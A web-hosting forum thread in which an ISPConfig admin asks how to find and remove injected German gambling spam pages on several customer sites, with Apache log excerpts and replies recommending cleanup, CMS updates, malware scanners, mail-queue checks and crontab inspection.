I currently have a lot of requests in apache access log with GET /gl%C3%BCcksspiel-salzburg/ or similar folders. The links work, but I cannot determine where they are comming from. I found these links in multiple domains on the server. ISPP_scan found some suspicious files, but not in all affected domains. Can you please tell me, how to get rid of that and prevent from similar attacks in future?
this is, what it shows: Code: 40.77.167.65 - - [10/Jan/2025:05:39:48 +0000] "GET /freispiele-bei-registrierung-2024/ HTTP/1.1" 200 16546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 40.77.167.58 - - [10/Jan/2025:05:40:45 +0000] "GET /spielothek-tauberbischofsheim/ HTTP/1.1" 200 13901 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 40.77.167.71 - - [10/Jan/2025:05:42:47 +0000] "GET /spielgeld-slots/ HTTP/1.1" 200 16644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 52.167.144.186 - - [10/Jan/2025:05:43:59 +0000] "GET /kartenspiele-f%C3%BCr-2-32-karten/ HTTP/1.1" 200 16605 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 40.77.167.71 - - [10/Jan/2025:05:48:29 +0000] "GET /bingo-spiel-anleitung/ HTTP/1.1" 200 16580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 40.77.167.58 - - [10/Jan/2025:05:48:36 +0000] "GET /casino-welches-speile-hat-die-meisten-freispiel/ HTTP/1.1" 200 16511 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 40.77.167.44 - - [10/Jan/2025:05:49:30 +0000] "GET /online-gl%C3%BCcksspiel-deutschland/ HTTP/1.1" 200 16575 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" you mean bing.com/bingbot as referer?
No that's just a crawler that has found it and now is indexing it. Which file is the logging from? General Apache or Nginx log? As you've posted in an ISPC topic I'm assuming your server is running ISPC to manage your websites. Than all websites should have their own log files and would you thereby know which site is troubling you. So if the logging is from the general webserver log than there seems to be something fundamentally wrong with your server installation.
yes it's ISPC and it's running on apache. As I said, multiple sites are affected and not in all of them ISPP_scan detected suspicious files. This is just a sequence of one customers log file, but I can find the same thing also in other customers logs.
Well then you know which sites are compromised. Clean those up and keep their cms software updated in the future. Other than that there's no real way to prevent it. Hackers exploid security leaks and can only do that if the website owner isn't updating/patching his or her software. I've seen it with especially wordpress websites way more times than I would like. Though wordpress has some good plugins like wordfence that can help a bit.
Like @remkoh mentioned, check the sites for suspicious file, you could e.g. search for recently changed files. Also, the issues can be in the database content at times. While ISPProtect finds most malware, there is no 100% guarantee, as with any antivirus software, that there is malware that slips through.
unfortunately, the server now was blacklisted by several blocklists. So many customers are not able to send mails anymore. Does anyone have experience with getting a server clean and getting it removed from blacklists? How to I find what SPAM Mails were sent from which user? Is there a way to allow smtp traffic only from specific countries? What else can I do to fix that? Thanks in advance!
https://www.faqforge.com/linux/how-to-find-out-who-sent-a-email-in-postfix-mailqueue/ I doubt that your problem is SMTP traffic from other countries. If websites get hacked, the SMTP traffic originates from your server; there is no incoming SMTP traffic from other countries. You must clean the hacked websites. As already mentioned, you can use ISPProtect to find Malware, as you did already. if you run WordPress, then installing WordFence is a good option to secure the site and prevent it getting infected again and you can use it to scan your sites for malware further. Also, check that you do not have cronjobs for the web user that reinjects malware into the sites. E.g. if the website has ID 10, then check with: crontab -l -u web10 If you can't get it cleaned up yourself, consider contacting Thom from ISPConfig business support team at AmsterdamTech and ask if he can do that for you: https://www.ispconfig.org/get-support/?type=ispconfig
hi till, thanks, especially for the crontab hint. I found an entry there, but when I try to change using crontab -e -u web.. (as root) nano tells me that the file was converted from DOS format and I'm not able to save the changed file. How can I change it?
